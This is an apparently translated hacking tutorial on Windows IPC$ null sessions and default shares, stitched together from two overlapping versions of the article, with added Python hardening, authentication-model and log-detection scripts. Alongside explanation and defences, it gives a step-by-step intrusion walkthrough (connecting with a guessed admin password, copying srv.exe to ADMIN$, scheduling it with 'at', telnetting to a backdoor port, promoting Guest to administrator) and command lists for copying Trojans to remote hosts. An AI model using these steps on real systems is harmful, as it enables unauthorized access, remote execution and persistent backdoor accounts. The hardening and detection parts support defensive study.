IPC$ commands explained in detail

I. Foreword

Articles about IPC$ intrusion are everywhere online, and the attack steps have even become a classic pattern, so nobody bothers to write about it any more. Even so, I personally feel these articles are not detailed enough: a rookie meeting IPC$ for the first time will not get his questions answered by a bare list of steps (just search any hacking forum for "IPC$" and see how many such questions there are).

II. What is IPC$

IPC$ (Internet Process Connection) is a resource shared as a "named pipe" (everyone says this): a named pipe opened for inter-process communication. By verifying a username and password the connecting side obtains the corresponding permissions, and can use it to manage the remote computer and view its shared resources. With IPC$, the connecting side can even establish a null connection (empty connection) to the target host without any username or password (of course the other machine must have IPC$ sharing turned on, otherwise you cannot connect), and over this null connection can obtain the list of users on the target host (although a responsible administrator will prohibit exporting the user list).

We keep hearing about "the IPC$ vulnerability". In fact IPC$ is not a true vulnerability. It is a remote network logon feature opened to make the administrator's remote management easier, and alongside it the default shares are opened: every logical disk (C$, D$, E$ ...) and the system directory Winnt or Windows (ADMIN$). The intention behind all this was to make management convenient, but good intentions do not always work out: some people with bad intentions (what intentions? never mind, just call them that) use IPC$ to access the shared resources, export the user list, and run dictionary tools to probe the passwords, hoping to gain higher permissions and so achieve their own ends.

Note:

1) IPC$ connection is a remote network logon feature unique to Windows NT and above, equivalent in function to Telnet on UNIX. Because IPC$ needs many DLL functions of Windows NT, it cannot run on Windows 9.x. That is, only NT/2000/XP can establish IPC$ connections; 98/ME cannot (some friends say a null connection can be established on 98; I don't know whether that is true, but it is 2003 now, and I suggest the comrades on 98 change systems, 98 is not cool).

2) Even a null connection cannot be established if the other side has closed IPC$ sharing; you will still fail to connect.

3) Establishing an IPC$ connection does not guarantee that you can view the other side's user list, because the administrator can disable exporting the user list.

III. The meaning of IPC$ connections in a hack attack

As said above, even a null connection can give you a lot of information (and this information is often essential to an intrusion) and access to some shares. If you can log in as a user with certain permissions, you get those permissions; obviously, if you log in as the administrator, hehe, nothing more needs saying: what you want, you can do!! (Basically you can obtain information about the target, manage its processes and services, upload a Trojan and run it, and if it is a 2000 Server you can also consider opening Terminal Services for convenient control. Is that enough?) But don't get excited too early, because the administrator's password is not so easy to get. Although there will be some careless administrators with empty passwords or idiotic passwords, they are few, and today is not the past: as people's security awareness improves, administrators have become more careful, and getting the administrator's password will be harder and harder :( So most likely you will be connecting with minimal permissions, and you will slowly discover that IPC$ connection is not universal; when the host has not even turned on IPC$ sharing, you cannot connect at all.

So I think you should not treat IPC$ intrusion as an ultimate weapon, and not think it decides the battle. It is like a pass in front of the goal on the football field: it rarely has a fatal effect, yet it is indispensable. That, I think, is the meaning of IPC$ connections in a hack intrusion.

IV. The relationship between IPC$, null connections, ports 139/445 and the default shares

The relationship among these four may be what confuses rookies the most, yet most articles do not explain it specially. In fact my own understanding is not very thorough either; all of this was summed up through discussion with everyone (a BBS with good discussion can be called a rookie paradise).

1) IPC$ and null connections. An IPC$ connection that needs no username and password is a null connection. Once you log in as a user or administrator (that is, an IPC$ connection with a specific username and password), it can no longer be called a null connection. Many people may ask: since I can connect anyway, why do I still have to scan for weak passwords? As I mentioned before, when you log in with a null connection you do not have any permissions (very depressing), whereas when you log in as a user or administrator you get the corresponding permissions (and who doesn't want permissions? so keep doing it the old way, don't be lazy).

2) IPC$ and ports 139/445. An IPC$ connection implements remote logon and access to the default shares; an open port 139 indicates the NetBIOS protocol is in use; and through ports 139 and 445 (Win2000) we can access shared files and printers. So in general, IPC$ connections are supported by port 139 or 445.

3) IPC$ and the default shares. The default shares are the shares opened by default to facilitate remote management by the administrator (you can of course turn them off): all logical disks (C$, D$, E$ ...) and the system directory Winnt or Windows (ADMIN$). We can access these default shares (provided the other side has not turned them off).

V. Reasons for IPC$ connection failure

The following five reasons are the most common:

1) Your system is not NT or above;
2) The other side has not opened IPC$ default sharing;
3) The other side has not opened port 139 or 445 (blocked by a firewall);
4) Your command is wrong (for example, missing spaces);
5) Wrong username or password (for a null connection this of course does not apply).

You can also analyse the cause from the returned error number:

Error 5, access denied: most likely the user you are using does not have administrator privileges; elevate your permissions first.
Error 51, Windows cannot find the network path: there is a problem with the network.
Error 53, the network path was not found: wrong IP address; the target is not booted; the target's LanmanServer service is not started; the target has a firewall (port filtering).
Error 67, the network name cannot be found: your LanmanWorkstation service is not started, or the target has deleted IPC$.
Error 1219, the credentials supplied conflict with an existing set of credentials: you have already established an IPC$ connection with the other side; delete it and try again.
Error 1326, unknown user name or bad password: the reason is obvious.
Error 1792, an attempt was made to log on, but the network logon service was not started: the target's Netlogon service is not started (this happens when connecting to a domain).
Error 2242, the password of this user has expired: the target has an account policy that enforces periodic password changes.

IPC$ is actually more complex than this. Besides the reasons above there are other uncertain factors that I cannot list one by one; it depends on everyone's own experience and trial.

VI. How to open the target's IPC$ (this section is taken from related articles)

First you need a shell that does not rely on IPC$, such as SQL's cmd extension, Telnet or a Trojan, and this shell must have admin privileges. Then you can use the shell to run "net share ipc$" to open IPC$. As seen above, IPC$ depends on several things, so please confirm that the relevant services are running; if they are not started, start them (if you don't know how, see the usage of the net command), and if that does not work either (for example a firewall, or being killed), I suggest giving up.

VII. How to prevent IPC$ intrusion

1. Prohibit null-connection enumeration (this does not prevent null connections from being established; quoted from "Anatomy of null sessions under Win2000")

Run regedit and find the following key:
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
Change the value of RestrictAnonymous (DWORD) to 00000001. (If it is set to 2 some problems will occur, for example some Windows services will have trouble.)

2. Prohibit the default shares

1) View the locally shared resources: Run - cmd - enter "net share".
2) Delete the shares (one per line, Enter after each):
    net share ipc$ /delete
    net share admin$ /delete
    net share c$ /delete
    net share d$ /delete
   (if there are E, F, ... continue deleting)
3) Stop the Server service: net stop server /y (after a restart the Server service will be reopened).
4) Modify the registry: Run - regedit.
   Server edition: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and change the value of AutoShareServer (DWORD) to 00000000.
   Pro edition: find the same key and change the value of AutoShareWks (DWORD) to 00000000.
   If the value mentioned above does not exist, create it (right-click - New - DWORD value) and then change its value.
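The registry measures above (RestrictAnonymous, AutoShareServer/AutoShareWks) and the Server-service measure that follows can be checked in one place rather than by opening regedit on each host. The script below is an added example and not part of the article; it is written in Python so that the check logic runs anywhere, and reads the live values only on Windows. The value names and keys are the ones the article quotes; the Start value under the LanmanServer service key and its meaning (4 = Disabled) are standard service-control values that I have added.

```python
"""Audit of the IPC$ hardening measures from section VII.

Added example, not code from the original article. The registry value names
(RestrictAnonymous, AutoShareServer, AutoShareWks) and their keys are the ones
the article gives; the Start value under the LanmanServer service key and its
meaning (4 = Disabled) are standard service-control values I have added. On
Windows, read_live_settings() pulls the real values with winreg; evaluate()
works on a plain dict so the logic runs on any platform, which is how the
constructed samples at the bottom are checked.
"""
import sys

LSA_KEY = r"SYSTEM\CurrentControlSet\Control\Lsa"
LANMAN_PARAMS = r"SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"
LANMAN_SERVICE = r"SYSTEM\CurrentControlSet\Services\LanmanServer"
SERVICE_DISABLED = 4  # value of "Start" meaning the service is disabled


def read_live_settings():
    """Read the relevant values from HKEY_LOCAL_MACHINE (Windows only)."""
    import winreg  # only available on Windows

    def value(path, name):
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
                return winreg.QueryValueEx(key, name)[0]
        except FileNotFoundError:
            return None  # missing key or value: Windows uses its default behaviour

    return {
        "RestrictAnonymous": value(LSA_KEY, "RestrictAnonymous"),
        "AutoShareServer": value(LANMAN_PARAMS, "AutoShareServer"),
        "AutoShareWks": value(LANMAN_PARAMS, "AutoShareWks"),
        "ServerStart": value(LANMAN_SERVICE, "Start"),
    }


def evaluate(settings, server_edition=True):
    """Return a list of findings; an empty list means the measures are in place."""
    findings = []

    # Measure 1: RestrictAnonymous=1 stops null-session enumeration of users and
    # shares (2 is stricter, but the article warns it breaks some services).
    if (settings.get("RestrictAnonymous") or 0) == 0:
        findings.append("RestrictAnonymous is 0 or absent: null sessions can "
                        "enumerate users and shares; set it to 1")

    # Measure 3: with the Server service disabled there is no IPC$ and no
    # default shares at all, so the AutoShare check below is moot.
    if settings.get("ServerStart") == SERVICE_DISABLED:
        return findings

    # Measure 2: AutoShareServer (Server) / AutoShareWks (Pro) = 0 stops C$, D$,
    # ADMIN$ from being recreated each time the Server service starts; deleting
    # them with "net share x$ /delete" alone does not survive a restart.
    name = "AutoShareServer" if server_edition else "AutoShareWks"
    if settings.get(name) != 0:
        findings.append(f"{name} is absent or non-zero: the default shares come "
                        f"back on restart; create it as DWORD 0")
    return findings


# Constructed samples: a default install and a host hardened as the article says.
DEFAULT_INSTALL = {"RestrictAnonymous": None, "AutoShareServer": None, "ServerStart": 2}
HARDENED_SERVER = {"RestrictAnonymous": 1, "AutoShareServer": 0, "ServerStart": 2}


def main():
    settings = read_live_settings() if sys.platform == "win32" else DEFAULT_INSTALL
    for finding in evaluate(settings) or ["all measures in place"]:
        print(finding)


if __name__ == "__main__":
    main()
```

Run it on the host itself with an administrative prompt; off Windows it evaluates the constructed default-install sample, which is useful for checking the logic before rolling it into an inventory script.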
3. Permanently shut down IPC$ and the default shares

Dependency: the LanmanServer service, displayed as "Server". Control Panel - Administrative Tools - Services - find the Server service - Properties - General - Startup type - Disabled.

4. Install a firewall (select the relevant settings), or use port filtering (filter out 139, 445, etc.), or use the new version of Windows Optimization Master.

5. Set complex passwords, to prevent password guessing through IPC$.

VIII. Related commands

1) Establish a null connection:
    net use \\IP\ipc$ "" /user:""
   (Pay attention: this command line contains three spaces.)
2) Establish a non-null connection:
    net use \\IP\ipc$ "password" /user:"username"
   (also three spaces)
3) Map a default share:
    net use z: \\IP\c$ "password" /user:"username"
   (maps the other side's C disk to your own Z disk; other disks likewise). If you have already established IPC$ with the target, you can access it directly by IP and drive letter; the specific command is:
    net use z: \\IP\c$
4) Delete an IPC$ connection:
    net use \\IP\ipc$ /del
5) Delete a share mapping:
    net use c: /del    (deletes the mapped C disk; other disks likewise)
    net use * /del     (deletes all; a prompt appears, press Y to confirm)

IX. The classic intrusion pattern

This is too classic; most IPC$ tutorials have introduced it, so I have brought it over too. Thanks to the original author (I don't know which senior)!

1. C:\>net use \\127.0.0.1\ipc$ "password" /user:"username"
   Generally the administrator account and password are obtained by scanning for weak passwords with Streamer (Fluxay).
2. C:\>copy srv.exe \\127.0.0.1\admin$
   Copies srv.exe over; admin$ is the system directory (here C:\winnt\system32\ of the other side; you can also use C$, D$, meaning the C disk and the D disk, depending on where you want to copy it).
3. C:\>net time \\127.0.0.1
   Queries the time. Suppose the current time of 127.0.0.1 is 2004/6/15 11:00 am, and "the command completed successfully".
4. C:\>at \\127.0.0.1 11:05 srv.exe
   Schedules srv.exe to start.
5. C:\>net time \\127.0.0.1
   Is it time yet? If the current time of 127.0.0.1 is 2004/6/15 11:05 am, prepare to start the following command.
6. C:\>telnet 127.0.0.1 99
   Here the telnet command is used; note that the port is 99. Telnet's default is port 23, but srv has created a port 99 for us on the other side. Although we can already telnet in, srv is one-time only and has to be activated again next time, so we plan to build a proper Telnet service. For this we use ntlm.
7. C:\>copy ntlm.exe \\127.0.0.1\admin$
   Copies ntlm.exe onto the host (ntlm.exe is also in the "Dream" tools directory).
8. C:\WINNT\system32>ntlm
   Enter "ntlm" to start it (here C:\WINNT\system32> refers to the other side; running ntlm actually runs the program on the other computer). When "DONE" appears, it is working normally. Then use "net start telnet" to open the Telnet service!
9. telnet 127.0.0.1, then enter the username and password to get into the other side; operations are as simple as on DOS! (And then what do you want to do? Whatever you like, haha!) To keep our access, we add Guest to the administrators group:
10. C:\>net user guest /active:yes
    Activates the other side's Guest user.
11. C:\>net user guest 1234
    Changes Guest's password to 1234, or whatever password you want to set.
12. C:\>net localgroup administrators guest /add
    Makes Guest an administrator (if the admin password changes but the Guest account does not, next time we can still use Guest to visit this computer).
IPC$ explained in detail

I. Foreword

Articles about IPC$ intrusion online are everywhere, and the attack steps have even become a classic pattern, so nobody is willing to write about it any more. Even so, I personally feel these articles are not detailed enough; someone meeting IPC$ for the first time cannot get his confusion answered by them (just search any hacking forum for "IPC$" and see how many such posts there are). So I have referred to some material, tutorials and forum posts online and written this summary, hoping to clear up some of the easily confused questions so that everyone does not keep stumbling at the same place!

Note: this article discusses the Win NT/2000 environment; Win98 is not discussed, and given that Win XP has improved its security settings, individual operations may not apply to it; there will be a chance to discuss it separately.

II. What is IPC$

IPC$ (Internet Process Connection) is a resource shared as a "named pipe", a named pipe opened for inter-process communication. By supplying a trusted username and password, the two connecting sides establish a secure channel and exchange encrypted data in that channel, thereby accessing the remote computer. IPC$ is a new feature of NT/2000 and has one characteristic: at the same time, only one connection is allowed between two IPs. While providing IPC$, NT/2000 also opens the default shares: all logical disks (C$, D$, E$ ...) and the system directory Winnt or Windows (ADMIN$). Microsoft's original intention with all this was to facilitate the administrator's management, but intentionally or not, it has lowered the security of the system.

We often hear people talk of the "IPC$ vulnerability". In fact IPC$ is not a true vulnerability; I think whoever says so must be referring to Microsoft's own 'back door': the null session. So what is a null session?

III. What is a null session

Before introducing the null session we need to understand how a secure session is established. In Windows NT 4.0 the challenge-response protocol is used to establish a session with the remote machine, and a successfully established session becomes a secure tunnel through which the two sides exchange information. The general process is as follows:

1) The session requester (client) sends a packet to the session receiver (server), requesting the establishment of a secure tunnel;
2) The server generates a random 64-bit number (the challenge) and sends it back to the client;
3) The client takes the 64-bit number generated by the server, transforms it with the password of the account trying to establish the session, and returns the result to the server (the response);
4) After receiving the response the server passes it to the Local Security Authority (LSA), which verifies the response with the user's correct password to confirm the requester's identity. If the requester's account is a local account of the server, verification is local; if it is a domain account, the response is sent to the domain controller for verification. When the response to the challenge is verified correct, an access token is generated and sent to the client. The client uses this access token to connect to resources on the server until the session is terminated.

That is the rough process by which a secure session is established. So what is a null session? A null session is a session established with the server without trust, that is, without supplying a username and password. According to the Win2000 access control model, establishing a null session also provides a token, but because no user information is authenticated while the null session is set up, this token contains no user information, and therefore the session does not allow the system to send encrypted information. That does not mean the null session's token has no security identifier (SID, which identifies users and groups): for a null session the SID the LSA puts in the token is S-1-5-7, the SID of the null session, and the username is ANONYMOUS LOGON (this username can be seen in the user list, but is not found in the SAM database). This access token contains the following groups: Everyone and Network. Within the limits of the security policy, the null session can access whatever these two groups are authorised to access. So what can we do after building a null session?

IV. What a null session can do

On NT with the default security settings, with a null connection you can list the users and shares on the target host, access shares with Everyone permission, access a small part of the registry, and so on; not much of use. On 2000 its role is even smaller, because in Windows 2000 and later only administrators and backup operators have the right to access the registry from the network by default, and that is not convenient to achieve with tools. From this we can see that this kind of untrusted session is not of much use, but viewed from a complete IPC$ intrusion, the null session is an indispensable springboard, because from it we can obtain the user list, and for an old hacker that is already enough.
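To make the four steps above and the difference between a verified session and a null session concrete, here is a toy model with both sides of the exchange. It is an added example, not the article's code and not the real NTLM algorithm (which the article does not describe): the keyed-hash construction, the sample accounts and the token fields are constructed for the example, while the anonymous SID S-1-5-7 and the groups Everyone and Network are the ones the article names.

```python
"""Toy model of the session set-up from section III, with both sides shown.

Added example; it is not the article's code and not the real NTLM algorithm.
The exchange follows the article's four steps: the server issues a random
64-bit challenge, the client returns a keyed hash of it derived from its
password, the server's LSA recomputes the expected answer from a stored
verifier and issues an access token. A client that supplies no credentials is a
null session and receives the anonymous token the article describes: user
ANONYMOUS LOGON, SID S-1-5-7, groups Everyone and Network. The HMAC-SHA256 /
SHA-256 construction and the sample accounts are constructed for the example.
"""
import hashlib
import hmac
import os

ANONYMOUS_SID = "S-1-5-7"  # SID of the null session, as given in the article


def password_verifier(password: str) -> bytes:
    """What the server stores instead of the clear-text password (constructed scheme)."""
    return hashlib.sha256(password.encode("utf-8")).digest()


class Client:
    def __init__(self, user=None, password=None):
        # user=None models a null session: nothing to prove, nothing to verify
        self.user, self.password = user, password

    def respond(self, challenge: bytes) -> bytes:
        # Step 3: answer the challenge with a keyed hash; the password itself
        # never goes on the wire, only a value bound to this one challenge.
        return hmac.new(password_verifier(self.password), challenge, hashlib.sha256).digest()


class Server:
    def __init__(self, accounts):
        # accounts: user -> (password, groups); only verifiers and groups are kept
        self._verifiers = {u: password_verifier(p) for u, (p, _) in accounts.items()}
        self._groups = {u: list(g) for u, (_, g) in accounts.items()}

    def challenge(self) -> bytes:
        return os.urandom(8)  # Step 2: fresh random 64-bit challenge

    def lsa_verify(self, user, challenge, response):
        # Step 4: the LSA recomputes the expected response from the stored verifier.
        verifier = self._verifiers.get(user)
        if verifier is None:
            return None
        expected = hmac.new(verifier, challenge, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, response):
            return None
        return {"user": user, "anonymous": False, "groups": self._groups[user],
                "encrypted_channel": True}

    @staticmethod
    def anonymous_token():
        # No user information was verified, so the token carries only the
        # anonymous SID and the two groups the article lists.
        return {"user": "ANONYMOUS LOGON", "sid": ANONYMOUS_SID, "anonymous": True,
                "groups": ["Everyone", "Network"], "encrypted_channel": False}


def establish_session(server: Server, client: Client):
    """Run the exchange; returns an access token, or None when verification fails."""
    challenge = server.challenge()                      # steps 1-2: request, challenge
    if client.user is None:                             # null session: no response
        return server.anonymous_token()
    response = client.respond(challenge)                # step 3
    return server.lsa_verify(client.user, challenge, response)  # step 4


# Constructed sample accounts for the demonstration.
SAMPLE_ACCOUNTS = {
    "alice": ("correct horse battery", ["Users"]),
    "administrator": ("S3cur3!pass", ["Administrators"]),
}

if __name__ == "__main__":
    srv = Server(SAMPLE_ACCOUNTS)
    print(establish_session(srv, Client("alice", "correct horse battery")))
    print(establish_session(srv, Client("alice", "wrong")))
    print(establish_session(srv, Client()))  # the null session
```

The point of the random challenge is visible in the model: a response captured for one challenge does not verify against a fresh one, so the server must never reuse a challenge, and what the null session gets is a token with the anonymous SID and no authenticated user behind it.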
The following are the specific commands that can be used in a null session:

1. First establish a null session (IPC$). Command:
    net use \\IP\ipc$ "" /user:""
   Note: the command above contains four spaces: one between net and use, one after use, and one on each side of the password.

2. View the remote host's shared resources. Command:
    net view \\IP
   Explanation: after the null connection is established, use this command to view the remote host's shared resources. If it has shares, you get results similar to:

    Shared resources at \\*.*.*.*
    Share name   Type   Used as   Comment
    -----------------------------------------------
    NETLOGON     Disk             Logon server share
    SYSVOL       Disk             Logon server share
    The command completed successfully.

3. View the remote host's current time. Command:
    net time \\IP
   Explanation: use this command to get the remote host's current time.

4. Get the NetBIOS name list (requires your own NBT to be enabled):
    nbtstat -A IP
   With this command you get a NetBIOS name list (requires NetBIOS support on your side); it returns results like:

    Node IpAddress: [*.*.*.*] Scope Id: []

               NetBIOS Remote Machine Name Table

           Name               Type         Status
        ---------------------------------------------
        SERVER         <00>  UNIQUE      Registered
        OYAMANISHI-H   <00>  GROUP       Registered
        OYAMANISHI-H   <1C>  GROUP       Registered
        SERVER         <20>  UNIQUE      Registered
        OYAMANISHI-H   <1B>  UNIQUE      Registered
        OYAMANISHI-H   <1E>  GROUP       Registered
        SERVER         <03>  UNIQUE      Registered
        OYAMANISHI-H   <1D>  UNIQUE      Registered
        ..__MSBROWSE__.<01>  GROUP       Registered
        INet~Services  <1C>  GROUP       Registered
        IS~SERVER......<00>  UNIQUE      Registered

        MAC Address = 00-50-8B-9A-2D-37

Those are the commands we often use in a null session. It seems there is quite a lot to do, but one thing you should note: establishing an IPC$ connection leaves a record in the event log, whether or not the logon succeeds. OK, next let's look at the ports IPC$ uses.

V. The ports IPC$ uses

First some basic knowledge:

1) SMB (Server Message Block): the Windows protocol for file and print sharing;
2) NBT (NetBIOS over TCP/IP): uses ports 137 (UDP), 138 (UDP) and 139 (TCP) to implement NetBIOS network interconnection on top of TCP/IP;
3) In Windows NT, SMB is implemented on top of NBT; in Windows 2000, besides the NBT implementation, SMB can also be carried directly over port 445.

With this basic knowledge we can further discuss which ports are used when accessing network shares.

For the Win2000 client:

1) If NBT is allowed when connecting to the server, the client tries to access ports 139 and 445 at the same time. If port 445 responds, the client sends an RST packet to port 139 to disconnect it and carries on the session over port 445; port 139 is used only when 445 does not respond; if neither port responds, the session fails;
2) If NBT is disabled when connecting to the server, the client only tries port 445; if 445 does not respond, the session fails. It follows that a Win2000 client with NBT disabled cannot connect to a server that offers only port 139, such as Windows NT.

For the Win2000 server side:

1) If NBT is allowed, UDP ports 137 and 138 and TCP ports 139 and 445 are open;
2) If NBT is disabled, only port 445 is open.

The IPC$ session we establish follows the same principles.
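Since, as noted above, every IPC$ connection leaves a record in the event log whether or not the logon succeeds, the log is where a defender catches this activity. The following is an added example (not code from the article) that runs over constructed Security-log records in a pipe-separated layout of my own, using the modern event IDs 4624/4625/5140 and logon type 3 rather than the NT/2000 event IDs of the article's era. It flags null sessions by the SID S-1-5-7 the article gives, a run of failed network logons followed by a success from the same source (the password probing the article warns about), and access to IPC$ and the default shares.

```python
"""Detection over Security-log records for what the article describes.

Added example, not code from the article. It flags three things the text points
at: null sessions (the article notes every IPC$ connection is logged, successful
or not), password probing followed by a successful logon, and access to IPC$ and
the default shares. The records below are constructed, the pipe-separated layout
is my own export format, and the event IDs are the modern Security-log ones
(4624 logon, 4625 failed logon, 5140 share accessed; logon type 3 = network).
"""
from collections import defaultdict
from datetime import datetime, timedelta

ANONYMOUS_SID = "S-1-5-7"  # the null-session SID the article gives

# time|event_id|logon_type|account|sid|source_ip|share   (constructed sample)
SAMPLE_LOG = r"""
2004-06-15T10:58:00|4624|3|ALICE|S-1-5-21-1-2-3-1001|10.1.1.7|
2004-06-15T11:00:02|4624|3|ANONYMOUS LOGON|S-1-5-7|192.0.2.10|
2004-06-15T11:00:05|5140|3|ANONYMOUS LOGON|S-1-5-7|192.0.2.10|\\*\IPC$
2004-06-15T11:01:00|4625|3|ADMINISTRATOR|-|192.0.2.10|
2004-06-15T11:01:02|4625|3|ADMINISTRATOR|-|192.0.2.10|
2004-06-15T11:01:04|4625|3|ADMINISTRATOR|-|192.0.2.10|
2004-06-15T11:01:06|4625|3|ADMINISTRATOR|-|192.0.2.10|
2004-06-15T11:01:08|4625|3|ADMINISTRATOR|-|192.0.2.10|
2004-06-15T11:01:10|4624|3|ADMINISTRATOR|S-1-5-21-1-2-3-500|192.0.2.10|
2004-06-15T11:01:12|5140|3|ADMINISTRATOR|S-1-5-21-1-2-3-500|192.0.2.10|\\*\ADMIN$
"""


def parse_events(text):
    """Turn the export lines into dicts sorted by time; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        when, event_id, logon_type, account, sid, src, share = line.split("|")
        events.append({"time": datetime.fromisoformat(when), "id": int(event_id),
                       "logon_type": int(logon_type), "account": account,
                       "sid": sid, "src": src, "share": share})
    return sorted(events, key=lambda e: e["time"])


def null_sessions(events):
    """Network logons under the anonymous SID: the null session itself."""
    return [(e["src"], e["time"]) for e in events
            if e["id"] == 4624 and e["logon_type"] == 3 and e["sid"] == ANONYMOUS_SID]


def probing_then_success(events, threshold=5, window=timedelta(minutes=5)):
    """Sources whose network logon succeeded after >= threshold failures inside window.

    Returns {source_ip: (failure_count, account_that_succeeded)}.
    """
    by_src = defaultdict(list)
    for e in events:
        if e["logon_type"] == 3 and e["id"] in (4624, 4625):
            by_src[e["src"]].append(e)
    hits = {}
    for src, evs in by_src.items():
        failures = []
        for e in evs:
            if e["id"] == 4625:
                failures.append(e["time"])
                continue
            recent = [t for t in failures if e["time"] - t <= window]
            if len(recent) >= threshold:
                hits[src] = (len(recent), e["account"])
            failures = []  # a success ends the current probing run
    return hits


def admin_share_access(events):
    """Share-access events on IPC$ or the default shares (names ending in $)."""
    return [(e["src"], e["account"], e["share"]) for e in events
            if e["id"] == 5140 and e["share"].endswith("$")]


def triage(text):
    events = parse_events(text)
    return {"null_sessions": null_sessions(events),
            "probing_then_success": probing_then_success(events),
            "admin_share_access": admin_share_access(events)}


if __name__ == "__main__":
    for name, hits in triage(SAMPLE_LOG).items():
        print(f"{name}: {hits}")
```

The threshold and window are the knobs to tune against your own baseline: a scanner running a dictionary produces dozens of 4625 events per minute from one source, while an administrator mistyping a password produces two or three, and the anonymous-SID check fires on the null session regardless of whether RestrictAnonymous later stops the enumeration.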
Obviously, if the remote server does not listen on port 139 or 445, an IPC$ session cannot be created.

VI. The meaning of IPC$ connections in a hack attack

As mentioned above, even a null connection can give you a lot of information (and this information is often essential). If you can log in as a user with certain permissions, you get the corresponding permissions; obviously, if you log in as the administrator, hey, you can do basically anything. But don't get excited too early, because the administrator's password is not so easy to get. Although some careless administrators do use weak passwords, they are few, and today is not the past: as people's security awareness rises, administrators have become more careful, and getting the administrator's password is ever harder. So the most likely outcome is that you connect with minimal permissions or even none, or the host has not even opened IPC$ sharing and you cannot connect at all. You will slowly discover that IPC$ connection is not universal, so don't expect every connection to succeed; that is unrealistic. A bit discouraged? No need. The key is to keep a level mentality: don't treat IPC$ intrusion as an ultimate weapon or think it decides the battle; it is just one intrusion method. You may use it to great effect, or it may achieve nothing; both are normal. In the hacker's world not every road leads to Rome, but there is always one that does. Be patient!

VII. Reasons for IPC$ connection failure

The following are common reasons for an IPC$ connection to fail:

1) IPC$ connection is a feature unique to Windows NT and above. Because it needs many DLL functions of Windows NT, it cannot run on Windows 9.x/ME; that is, only NT/2000/XP can establish IPC$ connections with each other, and 98/ME cannot;
2) To establish an IPC$ connection successfully, the other side must have IPC$ sharing open; even a null connection fails if the other side has closed IPC$ sharing;
3) You have not started the LanmanWorkstation service, which provides network connection and communication; without it you cannot initiate a connection request (display name: Workstation);
4) The other side has not started the LanmanServer service, which provides RPC support, file, print and named-pipe sharing; IPC$ depends on this service, and without it the remote host does not respond to your connection request (display name: Server);
5) The other side has not started Netlogon, which supports pass-through account logon for computers in the network;
6) The other side has disabled NBT (that is, closed port 139);
7) The other side's firewall blocks ports 139 and 445;
8) Your username or password is wrong (obviously a null session is exempt from this error);
9) Command input error: perhaps an extra space; when the username and password do not contain spaces, the double quotes on both sides can be omitted; if the password is empty, enter two quotation marks "" directly;
10) If the other side restarts the computer while the connection is established, the IPC$ connection is automatically disconnected and must be re-established.

In addition, you can analyse the cause from the returned error number:

Error 5, access denied: most likely the user you are using does not have administrator privileges; elevate your permissions first.
Error 51, Windows cannot find the network path: there is a problem with the network.
Error 53, the network path was not found: wrong IP address; the target is not booted; the target's LanmanServer service is not started; the target has a firewall (port filtering).
Error 67, the network name cannot be found: your LanmanWorkstation service is not started, or the target has deleted IPC$.
Error 1219, the credentials supplied conflict with an existing set of credentials: you have already established an IPC$ connection with the other side; delete it and try again.
Error 1326, unknown user name or bad password: the reason is obvious.
Error 1792, an attempt was made to log on, but the network logon service was not started: the target's Netlogon service is not started.
Error 2242, the password of this user has expired: the target has an account policy that enforces periodic password changes.

VIII. Reasons for file copy failure

Some friends have successfully established an IPC$ connection, but then run into trouble when copying: the copy fails. So what are the common causes of copy failure?
1) Blind copying. This type of error is the most common, accounting for more than half. Many friends do not even know whether the other side has a shared folder and copy blindly, and the result is of course depressing. So I suggest you must run "net view \\IP" before copying; do not assume that because the IPC$ connection succeeded there must be a shared folder.

2) Wrong judgement about the default shares. This type of error also occurs often, mainly in two ways: a) wrongly thinking that a host with which an IPC$ connection can be established must have the default shares open, and so copying to ADMIN$ immediately after connecting, which fails. A successful IPC$ connection only shows that the other side has IPC$ sharing open; IPC$ sharing and the default shares are two different things: IPC$ is a named pipe, not an actual folder, and the default shares are not a necessary condition for IPC$. b) Since "net view \\IP" cannot display the default shares (because their names carry $), we cannot judge whether the other side has them open, so if the other side has turned off the default shares, every operation on them fails. (Most scanning software can, however, find the default shared directories while scanning for passwords, which avoids this error.)

3) Insufficient user permissions, including four situations: a) when copying to any share (default or normal) over a null connection, in most cases the permissions are insufficient; b) copying to the default shares requires administrator privileges; c) copying to a normal share requires the corresponding permissions (i.e. the access permissions set by the other side); d) the other side may prohibit external access to the shares with a firewall or security software. It also needs saying: do not assume "administrator" is the administrator; the administrator's name can be changed.

4) Killed by a firewall, or inside a LAN. The copy may succeed but the firewall kills the file when it runs remotely; or you copy the Trojan to a host inside a LAN, and the connection back fails. So if the copy fails for these reasons, I suggest giving up. Everyone knows that in real operations IPC$ connections run into all sorts of problems; the above summarises only some common mistakes. Anything not mentioned can only be worked out by yourselves.

IX. How to open the target's IPC$ and other shares

The target's IPC$ is not easily opened; otherwise the world would be in chaos. You need a shell with admin privileges, such as Telnet or a Trojan, and then run "net share ipc$" to open the target's IPC$; "net share ipc$ /del" closes the share. If you want to open a shared folder, you can use "net share baby=c:\", which shares its C disk under the share name baby.

X. Commands that need a shell

Looking at many tutorials, this area is very unclear: commands that need a shell are presented as if they did not, which is misleading. So I summarise the commands that must be done in a shell:

1) Creating a user on the remote host, activating it, changing its password and adding it to the administrators group must all be done in a shell;
2) Opening the remote host's IPC$ sharing, default shares and normal shares must be done in a shell;
3) Starting/stopping services on the remote host must be done in a shell;
4) Starting/killing processes on the remote host must be done in a shell.

XI. Related commands that may be used in an intrusion

Please note whether each command applies locally or remotely. If it applies locally, you can only run it on the remote host after obtaining a shell there.
1) Establish a null connection:
    net use \\IP\ipc$ "" /user:""
2) Establish a non-null connection:
    net use \\IP\ipc$ "psw" /user:"account"
3) View the remote host's shared resources (but the default shares are not shown):
    net view \\IP
4) View the local host's shared resources (the local default shares are shown):
    net share
5) Get the NetBIOS name list:
    nbtstat -A IP
6) Get the user list from the local host:
    net user
7) View the remote host's time:
    net time \\IP
8) Display the local host's currently running services:
    net start
9) Start/stop a local service:
    net start servicename /y
    net stop servicename /y
10) Map a remote share:
    net use z: \\IP\baby
    This command maps the share named baby to the Z disk.
11) Delete a share mapping:
    net use c: /del        (deletes the mapped C disk; other disks likewise)
    net use * /del /y      (deletes all)
12) Copy a file to the remote host:
    copy \path\srv.exe \\IP\sharename
